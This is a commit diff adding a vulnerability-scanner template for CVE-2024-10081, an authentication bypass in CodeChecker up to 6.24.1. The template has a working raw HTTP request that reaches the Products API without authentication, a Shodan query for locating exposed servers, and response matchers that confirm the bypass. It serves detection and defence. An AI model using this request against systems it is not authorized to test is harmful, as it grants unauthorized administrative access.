Create CVE-2024-10081.yaml

2024-11-11 21:26:30 +05:30 · 2024-11-11 21:26:30 +05:30 · 6fc8e23a42
parent 63b8abf5d8
commit 6fc8e23a42
1 changed files with 39 additions and 0 deletions
--- a/http/cves/2024/CVE-2024-10081.yaml
+++ b/http/cves/2024/CVE-2024-10081.yaml
@ -0,0 +1,39 @@
+id: CVE-2024-10081
+
+info:
+  name: CodeChecker <= 6.24.1 Authentication Bypass
+  author: iamnoooob,rootxharsh,pdresearch
+  severity: critical
+  description: |
+    Authentication bypass occurs when the API URL ends with Authentication, Configuration or ServerInfo. This bypass allows superuser access to all API endpoints other than Authentication. These endpoints include the ability to add, edit, and remove products, among others.
+  reference:
+    - https://github.com/advisories/GHSA-f3f8-vx3w-hp5q
+    - https://github.com/Ericsson/codechecker/security/advisories/GHSA-f3f8-vx3w-hp5q
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N
+    cvss-score: 10
+    cve-id: CVE-2024-10081
+    cwe-id: CWE-288
+    epss-score: 0.00043
+    epss-percentile: 0.09989
+  metadata:
+    verified: true
+    max-request: 1
+    shodan-query: http.favicon.hash:-1496590341
+  tags: cve,cve2024,code-checker,auth-bypass
+
+http:
+  - raw:
+      - |-
+        POST /v6.58/Products/Authentication HTTP/1.1
+        Host: {{Hostname}}
+
+        [1,"getProducts",1,1,{}]
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "contains(body,'{\\\"0\\\":{\\\"lst\\\":[\\\"rec\\\",')"
+          - "!contains(body,'Error code 401: Unauthorized')"
+          - "contains(header,'application/x-thrift')"
+        condition: and